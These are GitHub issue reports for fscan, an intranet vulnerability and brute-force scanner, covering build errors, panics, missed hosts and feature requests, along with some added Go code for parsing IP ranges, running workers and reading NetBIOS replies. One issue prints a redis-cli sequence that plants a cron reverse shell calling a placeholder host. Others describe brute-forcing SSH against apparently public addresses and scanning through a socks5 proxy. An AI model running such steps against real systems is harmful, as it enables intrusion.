shadow1ng / fscan
An all-in-one intranet scanning tool for convenient one-click, automated, full-coverage vulnerability scanning.
License: MIT License
Hi, why does the build fail?
The error:
C:\Users\Getin\Desktop\fscan-main>go build -ldflags="-s -w " -trimpath main.go
Plugins\ftp.go:4:2: imported and not used: "errors"
Plugins\ftp.go:8:2: imported and not used: "net"
Plugins\ms17017.go:130:4: undefined: MS17010EXP
When aborting, send an RST packet directly (i.e. turn that FIN,ACK into RST,ACK).
That way the connection is torn down; there won't be any short-lived connections left over, the connection should simply disappear.
This approach works both for SYN scanning and for aborting short connections; I'm not sure how hard it is to implement.
When I increased the web ports to the following:
Info.Ports = "80,81,88,443,888,7001,7002,7004,7008,7080,8000,8001,8002,8008,8010,8048,8080,8081,8082,8084,8088,8089,8090,8098,8161,8848,8880,8888,9001,9080,9090,9098,9200"
and added the same ports to DefaultPorts,
I found that the tool first runs the open check on every port, and only when it reaches the web ports does it run title and poc, which makes it very inefficient.
Suggestion: don't run TCPportScan on web ports; when the IP is alive skip TCPportScan, and raise the thread count of the web module.
I'm currently doing an internal security review of a class B (/16) range at my company, and it looks like the SSH and SMB brute-force results in the updated version are all empty. The default thread count is 600; for accuracy we set the threads to 100 and still don't get the expected results. The username and password (both confirmed correct) are passed via parameters; the command is:
./fscan_amd64_upx -h 10.x.0.1/16 -user xxx -pwd xxx -t 100
redis> CONFIG GET dir
dir
/var/lib/redis
redis> CONFIG GET dbfilename
dbfilename
dump.rdb
redis> set x "\n* * * * * bash -i >& /dev/tcp/x.x.x.x/9999 0>&1\n"
OK
redis> config set dir /var/spool/cron/
OK
redis> config set dbfilename root
OK
redis> save // save the config, writing the reverse shell into crontab
OK
redis> config set dir /var/lib/redis // restore the redis config
OK
redis> config set dbfilename dump.rdb // restore the redis config
OK
See the problem? The scanner changes dir and dbfilename directly and never changes them back; I'd suggest improving this point~
The file is ParseIP.go under common/.
Line 134 reads:
	for num := startNum; num < endNum; num++ {
		ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
		AllIP = append(AllIP, ip)
	}
Line 114 reads:
	for i := ip1; i <= ip2; i++ {
		AllIP = append(AllIP, PrefixIP+"."+strconv.Itoa(i))
	}
The first loop is closed at the start and open at the end, the second is closed at both ends, so the IP scan results differ by one address.
Feature request: take a list of IPs and scan a small set of common web ports, only over http and https, drop responses with status 400, follow redirects after access, and extract the title, status code and response size into a CSV file.
First I ran ./fscan -h 10.9.54.1/24
10.9.54.4:22 open
10.9.54.4:8089 open
10.9.54.8:22 open
10.9.54.12:22 open
10.9.54.8:3306 open
10.9.54.6:22 open
10.9.54.5:22 open
10.9.54.8:6379 open
10.9.54.13:22 open
10.9.54.10:22 open
10.9.54.2:80 open
10.9.54.2:8080 open
10.9.54.10:3306 open
10.9.54.10:80 open
10.9.54.8:27017 open
10.9.54.254:22 open
10.9.54.2:11211 open
10.9.54.8:9200 open
10.9.54.8:11211 open
10.9.54.5:8080 open
10.9.54.6:8089 open
10.9.54.9:22 open
10.9.54.7:22 open
10.9.54.9:8080 open
10.9.54.2:8089 open
Then I ran ./fscan -h 10.9.54.1/16
10.9.3.13:21 open
10.9.2.11:22 open
10.9.3.13:22 open
10.9.3.13:80 open
10.9.2.11:80 open
10.9.3.13:443 open
10.9.2.5:22 open
10.9.3.13:3306 open
10.9.2.5:80 open
10.9.2.16:22 open
10.9.3.13:5432 open
10.9.2.11:443 open
10.9.2.5:443 open
10.9.3.5:22 open
10.9.2.12:22 open
10.9.2.2:22 open
10.9.2.2:80 open
10.9.3.4:22 open
10.9.2.4:22 open
10.9.2.2:443 open
10.9.2.3:80 open
10.9.2.3:443 open
10.9.2.12:443 open
10.9.3.13:8000 open
10.9.3.3:22 open
10.9.2.12:80 open
10.9.2.3:22 open
10.9.2.4:80 open
10.9.2.4:443 open
10.9.3.3:8080 open
10.9.3.10:80 open
10.9.3.10:443 open
10.9.3.10:21 open
10.9.3.10:22 open
10.9.3.10:3306 open
10.9.3.10:5432 open
10.9.3.10:8000 open
10.9.11.3:443 open
10.9.11.3:80 open
10.9.11.2:443 open
10.9.11.2:80 open
10.9.11.1:443 open
10.9.3.2:22 open
10.9.3.1:22 open
10.9.11.5:22 open
10.9.3.254:22 open
10.9.8.2:22 open
10.9.2.13:22 open
10.9.2.13:80 open
10.9.2.13:443 open
10.9.2.250:22 open
10.9.11.1:80 open
10.9.3.1:8080 open
Many subnets were never scanned before it finished.
The same happens with -hf; I later found that this occurs whenever the number of IPs to scan is too large.
./fscan_amd64_upx -h 10.1.1.1/16
Running with parameters like this only performs the ping scan; the scan plugins are never executed.
ssh 35.198.203.xxx:22 root 0048 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
With this "none", does it mean the host doesn't support password authentication? If so, this bug is serious.
If authentication isn't supported, why does it keep sending traffic!??
// So I opened ssh manually and found that it uses public-key authentication, so this problem is a big one right now.
I also noticed that the same IP shows up in two log lines:
已完成 1680/1781 [-] ssh 34.97.91.a:22 root 1914 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
已完成 1709/1810 [-] ssh 34.97.91.a:22 root 2046 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
Add TCP-based protocol detection.
For example, running 100 connections with this tool makes the gateway RTT swing wildly, even drop packets.
ncrack running 200 barely moves the RTT.
With the connection count at 100 for both, one stalls and the other doesn't.
Really strange. Is this poor support for TIME_WAIT reuse?
WebScan\WebScan.go:4:2: package embed is not in GOROOT (E:\go\src\embed)
This problem occurred with Go version 1.15.
package github.com/shadow1ng/fscan
imports github.com/shadow1ng/fscan/Plugins
imports github.com/shadow1ng/fscan/WebScan
imports embed: no Go files in /usr/local/go/src/embed
When scanning a class B (/16) range, live hosts and ports are missed, and the results differ on every run; default icmp mode.
A class C (/24) range doesn't have this problem.
It would be nice to add a silent output mode, like ksubdomain's -silent parameter.
When enabled, only successfully brute-forced or detected results are printed on screen.
The ssh dictionary is missing root/root.
Environment: macOS (works fine on Windows)
Normal case:
go run main.go -h 172.20.10.1/24
(Ping) Target '172.20.10.15' is alive
(Ping) Target '172.20.10.1' is alive
(Ping) Target '172.20.10.3' is alive
icmp alive hosts len is: 3
172.20.10.1:21 open
With -np,
scanning produces errors and cannot finish on its own.
go run main.go -h 172.20.10.1/24 -np
172.20.10.63:21 open
172.20.10.29:21 open
172.20.10.62:21 open
open result.txt: too many open files
open result.txt: too many open files
172.20.10.64:21 open
open result.txt: too many open files
172.20.10.54:21 open
open result.txt: too many open files
...
After scanning the weblogic vulnerabilities it hangs; after a while the process exits on its own, and there is no "scan end" output.
Please add an option to skip a specific POC; the program runs very slowly when brute-forcing FTP and I'd like to skip it.
2020/12/19 22:34:53 Unsolicited response received on idle HTTP channel starting with "HTTP/1.1 200 OK\r\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\r\nPragma: no-cache\r\nContent-Type: text/html\r\nX-Download-Options: noopen\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1; mode=block\r\nContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'\r\nX-Content-Type-Options: nosniff\r\nDate: Sat, 19 Dec 2020 14:34:47 GMT\r\nConnection: Keep-Alive\r\nContent-Language: en\r\nContent-Length: 5551\r\n\r\n"; err=
It terminates after this error.
Also, why does it hang for a long time at the end after finishing the weak-password checks on Linux?
Hi, after using it several times I've found that when scanning class B and class C ranges with many hosts, the mysql, ftp and mssql brute-force modules hang; without pressing ctrl+c there's no telling how long they take to finish. Is there a way to solve this?
panic: reflect: call of reflect.Value.Type on zero Value
goroutine 209696 [running]:
reflect.Value.Type(0x0, 0x0, 0x0, 0x4, 0x221a2a0)
c:/go/src/reflect/value.go:1908 +0x13e
github.com/shadow1ng/fscan/Plugins.ScanFunc(0x1434c000, 0x148c09cd, 0x4, 0x15664fbc, 0x1, 0x1, 0x0, 0x138173d, 0x1d651ec, 0x14026100, ...)
C:/source/fscan-main/Plugins/scanner.go:75 +0xbb
github.com/shadow1ng/fscan/Plugins.AddScan.func1(0x148c09cd, 0x4, 0x14baeb40, 0x140e45f0, 0x14a6e3c0)
C:/source/fscan-main/Plugins/scanner.go:58 +0x71
created by github.com/shadow1ng/fscan/Plugins.AddScan
C:/source/fscan-main/Plugins/scanner.go:57 +0x9d
Scenario: a socks5 proxy is exposed from a web server via nps; the attacker connects to the socks5 proxy locally and uses fscan to scan the intranet, but gets no successful results at all.
A:
What problems did you say the latest fscan has?
XXXXXX:
Still garbled text
A:
Anything else?
XXXXXX:
I mean the garbled text in result.txt
A:
It only handles those three encodings; ISO is also common and wasn't added
XXXXXX:
I see, I'll open an issue for him
A:
Faster to change it yourself
A:
Everything except 443 is accessed over http, no wonder it misses things
XXXXXX:
Filing another issue
XXXXXX:
Have him try both
A:
Let me finish reading first; there's a function later on that seems able to recognize https, and some other handling too
A:
It really does only recognize port 443. Also, for 302 redirects it only follows once; yesterday several sites I brute-forced redirected three times, although the first login usually only has one redirect
XXXXXX:
File an issue for him
A:
You go do it
A:
I'm not a freeloader
It just scans and then stops; is this normal?
172.16.0.0/12 is a private range, so the command to scan the 172 range should be:
fscan -h 172.16.xx.xx/12
However, this is not supported.
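Two of the reports above concern target expansion: the half-open loop in ParseIP.go (line 134 versus line 114) drops the last address of a range, and /12 prefixes such as 172.16.0.0/12 are not accepted. As an added example, not fscan's own ParseIP code, this Go snippet expands a.b.c.d, a.b.c.d/N for any prefix length, a.b.c.d-e and a.b.c.d-w.x.y.z with both ends inclusive, and refuses to materialise more addresses than a caller-supplied limit. TargetBounds, TargetCount and ExpandTargets are assumed names.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"net"
	"strconv"
	"strings"
)

// ipToU32 / u32ToIP convert between dotted IPv4 and a 32-bit integer so
// that ranges can be iterated arithmetically.
func ipToU32(ip net.IP) (uint32, bool) {
	ip4 := ip.To4()
	if ip4 == nil {
		return 0, false
	}
	return binary.BigEndian.Uint32(ip4), true
}

func u32ToIP(n uint32) string {
	var b [4]byte
	binary.BigEndian.PutUint32(b[:], n)
	return net.IP(b[:]).String()
}

func parseV4(s string) (uint32, error) {
	ip := net.ParseIP(strings.TrimSpace(s))
	if ip == nil {
		return 0, fmt.Errorf("%q: not an IP address", s)
	}
	n, ok := ipToU32(ip)
	if !ok {
		return 0, fmt.Errorf("%q: only IPv4 is supported", s)
	}
	return n, nil
}

// TargetBounds returns the first and last address (both inclusive) denoted
// by spec: "a.b.c.d", "a.b.c.d/N" (any N in 0..32), "a.b.c.d-e" (last
// octet range) or "a.b.c.d-w.x.y.z".
func TargetBounds(spec string) (uint32, uint32, error) {
	spec = strings.TrimSpace(spec)
	switch {
	case strings.Contains(spec, "/"):
		_, ipnet, err := net.ParseCIDR(spec) // ipnet.IP is already masked
		if err != nil {
			return 0, 0, err
		}
		first, ok := ipToU32(ipnet.IP)
		if !ok {
			return 0, 0, fmt.Errorf("%q: only IPv4 is supported", spec)
		}
		ones, bits := ipnet.Mask.Size()
		hostBits := uint(bits - ones)
		// last = first with every host bit set; uint64 keeps /0 well defined
		last := uint32(uint64(first) | (uint64(1)<<hostBits - 1))
		return first, last, nil
	case strings.Contains(spec, "-"):
		parts := strings.SplitN(spec, "-", 2)
		first, err := parseV4(parts[0])
		if err != nil {
			return 0, 0, err
		}
		var last uint32
		if strings.Contains(parts[1], ".") {
			if last, err = parseV4(parts[1]); err != nil {
				return 0, 0, err
			}
		} else {
			// "a.b.c.d-e": e replaces the last octet
			e, err := strconv.Atoi(strings.TrimSpace(parts[1]))
			if err != nil || e < 0 || e > 255 {
				return 0, 0, fmt.Errorf("%q: last octet must be 0..255", spec)
			}
			last = first&^0xff | uint32(e)
		}
		if last < first {
			return 0, 0, fmt.Errorf("%q: end is before start", spec)
		}
		return first, last, nil
	default:
		n, err := parseV4(spec)
		if err != nil {
			return 0, 0, err
		}
		return n, n, nil
	}
}

// TargetCount is the number of addresses spec denotes, without expanding it.
func TargetCount(spec string) (uint64, error) {
	first, last, err := TargetBounds(spec)
	if err != nil {
		return 0, err
	}
	return uint64(last) - uint64(first) + 1, nil
}

// ExpandTargets lists every address in spec, inclusive on both ends, and
// refuses to build more than limit strings (a /8 is 16 million of them).
func ExpandTargets(spec string, limit uint64) ([]string, error) {
	first, last, err := TargetBounds(spec)
	if err != nil {
		return nil, err
	}
	n := uint64(last) - uint64(first) + 1
	if n > limit {
		return nil, fmt.Errorf("%q expands to %d addresses, limit is %d", spec, n, limit)
	}
	out := make([]string, 0, n)
	// a uint64 counter cannot wrap when the range ends at 255.255.255.255
	for i := uint64(first); i <= uint64(last); i++ {
		out = append(out, u32ToIP(uint32(i)))
	}
	return out, nil
}

func main() {
	for _, spec := range []string{"10.9.54.1/24", "172.16.1.1/12", "192.168.1.10-12"} {
		n, err := TargetCount(spec)
		fmt.Printf("%-16s -> %d addresses (err=%v)\n", spec, n, err)
	}
	ips, _ := ExpandTargets("192.168.1.10-12", 16)
	fmt.Println(ips)
}
```

The closed-interval convention is applied in one place (TargetBounds), so the two code paths can no longer disagree by one address the way the two loops in ParseIP.go do.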
I searched Baidu all over and still can't tell what the problem is.
I added xray pocs to fscan; the format is identical, so why aren't they detected?..
Would you consider class B (/16) scanning? Liveness probing across a /16 is often needed.
Could you add -f to read an IP list from a file?
func checkVul(tasks []Task, ticker *time.Ticker) <-chan Task {
	var wg sync.WaitGroup
	results := make(chan Task)
	for _, task := range tasks { // spawning goroutines like this runs a hundred tasks all at once....
		wg.Add(1)
		go func(task Task) { // task is already a local variable here; there is no need to pass it in as a function parameter
			defer wg.Done()
			<-ticker.C // using the ticker here, each tick releases several goroutines concurrently; with rate 5, five run at 0.00s, when it should really be one every 200 milliseconds
			isVul, err := executePoc(task.Req, task.Poc)
			if err != nil {
				return
			}
			if isVul {
				results <- task
			}
		}(task)
	}
	go func() {
		wg.Wait() // by the time this reaches Wait, the return below may already have executed; could the returned results then miss some scan results? Just running these two statements with a defer would do, no need to start a goroutine, right?
		close(results)
	}()
	return results
}
I personally think writing it like this is more sensible:
// start process
fmt.Println("Start Process: ", proWorkers)
for i := 0; i < proWorkers; i++ {
	pWait.Add(1)
	go func() {
		for data := range processQueue {
			func() {
				defer common.CatchPanic()
				result := handler(data)
				if !IsNil(result) {
					outQueue <- result
				}
			}()
		}
		pWait.Done()
	}()
}
The formatting is a bit rough, keep up the good work~
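The two points raised in the review above (a ticker releasing every waiting goroutine at once, and the results channel being closed by a goroutine that races with the caller) are what a bounded worker pool solves. The following is an added illustration, not fscan's scanner code: a fixed number of workers pull from a task channel, each admission waits on a ticker whose channel buffers only one tick so exactly one task starts per interval, and results is closed only after WaitGroup.Wait returns. Task, RunPool and CollectHits are assumed names; Check stands in for executePoc.

```go
package main

import (
	"context"
	"fmt"
	"sort"
	"sync"
	"time"
)

// Task is one unit of scan work; Check runs the probe (a stand-in for the
// executePoc call in the snippet under review).
type Task struct {
	ID    int
	Check func() (bool, error)
}

// RunPool executes tasks with at most `workers` goroutines in flight and
// admits at most one task per interval (interval must be > 0). The results
// channel is closed only after every worker has returned, so a consumer can
// range over it without losing results. Cancelling ctx stops the pool.
func RunPool(ctx context.Context, tasks []Task, workers int, interval time.Duration) <-chan Task {
	if workers < 1 {
		workers = 1
	}
	queue := make(chan Task)
	results := make(chan Task)
	ticker := time.NewTicker(interval)

	var wg sync.WaitGroup
	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for t := range queue {
				// ticker.C holds at most one pending tick, so when several
				// workers wait here only one of them proceeds per tick
				select {
				case <-ticker.C:
				case <-ctx.Done():
					return
				}
				hit, err := t.Check()
				if err != nil || !hit {
					continue
				}
				select {
				case results <- t:
				case <-ctx.Done():
					return
				}
			}
		}()
	}

	// feeder: hands tasks to whichever worker is free, stops on cancel
	go func() {
		defer close(queue)
		for _, t := range tasks {
			select {
			case queue <- t:
			case <-ctx.Done():
				return
			}
		}
	}()

	// closer: no worker can send on results after wg.Wait returns
	go func() {
		wg.Wait()
		ticker.Stop()
		close(results)
	}()
	return results
}

// CollectHits drains the pool and returns the IDs of tasks whose check
// returned true, sorted so callers can compare the result deterministically.
func CollectHits(ctx context.Context, tasks []Task, workers int, interval time.Duration) []int {
	var ids []int
	for t := range RunPool(ctx, tasks, workers, interval) {
		ids = append(ids, t.ID)
	}
	sort.Ints(ids)
	return ids
}

func main() {
	// constructed tasks: every third one "hits"
	var tasks []Task
	for i := 0; i < 10; i++ {
		id := i
		tasks = append(tasks, Task{ID: id, Check: func() (bool, error) { return id%3 == 0, nil }})
	}
	fmt.Println("hits:", CollectHits(context.Background(), tasks, 3, 200*time.Millisecond))
}
```

With 100 tasks and rate 5 this starts one task every 200 ms rather than five at once, and no more than `workers` probes are ever in flight regardless of how many tasks are queued.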
Why is there no Oracle database detection?
win10 x64, freshly compiled latest version
PS D:\Tools> .\fscan.exe -h 192.168.101.177
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.6.0
start infoscan
(icmp) Target '192.168.101.177' is alive
icmp alive hosts len is: 1
192.168.101.177:8080 open
192.168.101.177:139 open
192.168.101.177:80 open
192.168.101.177:21 open
192.168.101.177:443 open
192.168.101.177:9100 open
alive ports len is: 6
start vulscan
[*] WebTitle:http://192.168.101.177:8080 404 404 Not Found
panic: runtime error: slice bounds out of range [47:45]
goroutine 1107 [running]:
github.com/shadow1ng/fscan/Plugins.NetBIOS1(0xc0003e2180, 0xc0003aa620, 0xf, 0xc0003aa6c0, 0x9, 0xc000160930, 0x65, 0x0, 0x0, 0x0, ...)
github.com/shadow1ng/fscan/Plugins/NetBIOS.go:128 +0x157f
github.com/shadow1ng/fscan/Plugins.NetBIOS(0xc0003e2180, 0x0, 0x0)
github.com/shadow1ng/fscan/Plugins/NetBIOS.go:51 +0x75
reflect.Value.call(0xf18020, 0x1267a78, 0x13, 0x10279f9, 0x4, 0xc00054e000, 0x1, 0x1, 0xc000aa9e90, 0x80e358, ...)
reflect/value.go:476 +0x907
reflect.Value.Call(0xf18020, 0x1267a78, 0x13, 0xc00054e000, 0x1, 0x1, 0xc000412b98, 0xc000a98600, 0xc000a98688)
reflect/value.go:337 +0xc5
github.com/shadow1ng/fscan/Plugins.ScanFunc(0xc0003b0600, 0xc000b8e208, 0x3, 0xc000aa9f98, 0x1, 0x1, 0x0, 0x0, 0x803b5d, 0x12686a0, ...)
github.com/shadow1ng/fscan/Plugins/scanner.go:102 +0x245
github.com/shadow1ng/fscan/Plugins.AddScan.func1(0xc000b8e208, 0x3, 0xc0003e2180, 0xc0003aabe4, 0xc00007c8a0)
github.com/shadow1ng/fscan/Plugins/scanner.go:81 +0xcd
created by github.com/shadow1ng/fscan/Plugins.AddScan
github.com/shadow1ng/fscan/Plugins/scanner.go:77 +0xdd
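The panic above is a slice bounds error while parsing a NetBIOS reply. As an added example (not fscan's NetBIOS.go), here is how the node-status RDATA layout from RFC 1002 section 4.2.18 can be parsed with every length checked before slicing, so a short or malformed reply returns an error instead of crashing the goroutine. ParseNodeStatusRData and BuildSampleRData are assumed names; the sample packet and MAC address are constructed.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// NodeName is one entry of a NetBIOS node status response (RFC 1002 §4.2.18).
type NodeName struct {
	Name   string // 15-character NetBIOS name, trailing spaces trimmed
	Suffix byte   // 16th byte: service type (0x00 workstation, 0x20 file server, ...)
	Flags  uint16 // NAME_FLAGS (group bit, node type, ...)
}

var ErrTruncated = errors.New("node status rdata truncated")

// ParseNodeStatusRData parses the RDATA of an NBSTAT answer record:
//
//	NUM_NAMES (1 byte)
//	NUM_NAMES x { NETBIOS_NAME (16 bytes), NAME_FLAGS (2 bytes) }
//	STATISTICS, beginning with UNIT_ID (6 bytes, the adapter MAC)
//
// Every slice is length-checked before it is taken, so a short or
// malicious reply yields ErrTruncated instead of a runtime panic.
func ParseNodeStatusRData(rdata []byte) ([]NodeName, [6]byte, error) {
	var mac [6]byte
	if len(rdata) < 1 {
		return nil, mac, ErrTruncated
	}
	num := int(rdata[0])
	off := 1
	const entryLen = 18
	// NUM_NAMES comes from the wire; check the whole array fits before looping
	if len(rdata) < off+num*entryLen {
		return nil, mac, fmt.Errorf("%w: need %d bytes for %d names, have %d",
			ErrTruncated, off+num*entryLen, num, len(rdata))
	}
	names := make([]NodeName, 0, num)
	for i := 0; i < num; i++ {
		e := rdata[off : off+entryLen]
		names = append(names, NodeName{
			Name:   strings.TrimRight(string(e[:15]), " "),
			Suffix: e[15],
			Flags:  binary.BigEndian.Uint16(e[16:18]),
		})
		off += entryLen
	}
	if len(rdata) < off+6 {
		return names, mac, fmt.Errorf("%w: statistics block missing", ErrTruncated)
	}
	copy(mac[:], rdata[off:off+6])
	return names, mac, nil
}

// BuildSampleRData constructs a well-formed RDATA for demonstration; a real
// scanner would take these bytes from the UDP/137 response instead.
func BuildSampleRData(names []NodeName, mac [6]byte) []byte {
	b := []byte{byte(len(names))}
	for _, n := range names {
		name := fmt.Sprintf("%-15s", n.Name)
		b = append(b, name[:15]...)
		b = append(b, n.Suffix, byte(n.Flags>>8), byte(n.Flags))
	}
	return append(b, mac[:]...)
}

func main() {
	mac := [6]byte{0x00, 0x0c, 0x29, 0x12, 0x34, 0x56} // constructed
	rd := BuildSampleRData([]NodeName{
		{Name: "WORKSTATION", Suffix: 0x00, Flags: 0x0400},
		{Name: "WORKGROUP", Suffix: 0x1e, Flags: 0x8400},
	}, mac)
	names, gotMac, err := ParseNodeStatusRData(rd)
	fmt.Printf("names=%+v mac=%x err=%v\n", names, gotMac, err)
	// a reply cut off mid-array must fail cleanly rather than panic
	_, _, err = ParseNodeStatusRData(rd[:20])
	fmt.Println("truncated:", err)
}
```

The rule applied is the usual one for untrusted wire data: derive the required length from the header field, compare it with len(rdata) once, and only then slice; the same check belongs in front of every fixed-offset access in a response parser.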
Parameters:
-h 10.1.1.1/8 -p 7001,7002,8880 -m webtitle or
-h 10.1.1.1/8 -p 7001,7002,8880
It stops on its own after the ping scan, without any error.
Changing to -h 10.1.1.1/16 -p 7001,7002,8880 -m webtitle runs normally.
Also, I want your cmd background wallpaper! 😂
start vulscan
panic: reflect: call of reflect.Value.Type on zero Value
goroutine 7663 [running]:
reflect.Value.Type(0x0, 0x0, 0x0, 0x4, 0x19bf400)
reflect/value.go:1908 +0x190
github.com/shadow1ng/fscan/Plugins.ScanFunc(0xc000326690, 0xc000386970, 0x4, 0xc0003f5f98, 0x1, 0x1, 0x0, 0x0, 0x883b5d, 0x12eca80, ...)
github.com/shadow1ng/fscan/Plugins/scanner.go:97 +0x105
github.com/shadow1ng/fscan/Plugins.AddScan.func1(0xc000386970, 0x4, 0xc000510270, 0xc000321e00, 0xc00003a900)
github.com/shadow1ng/fscan/Plugins/scanner.go:85 +0xcd
created by github.com/shadow1ng/fscan/Plugins.AddScan
github.com/shadow1ng/fscan/Plugins/scanner.go:81 +0xdd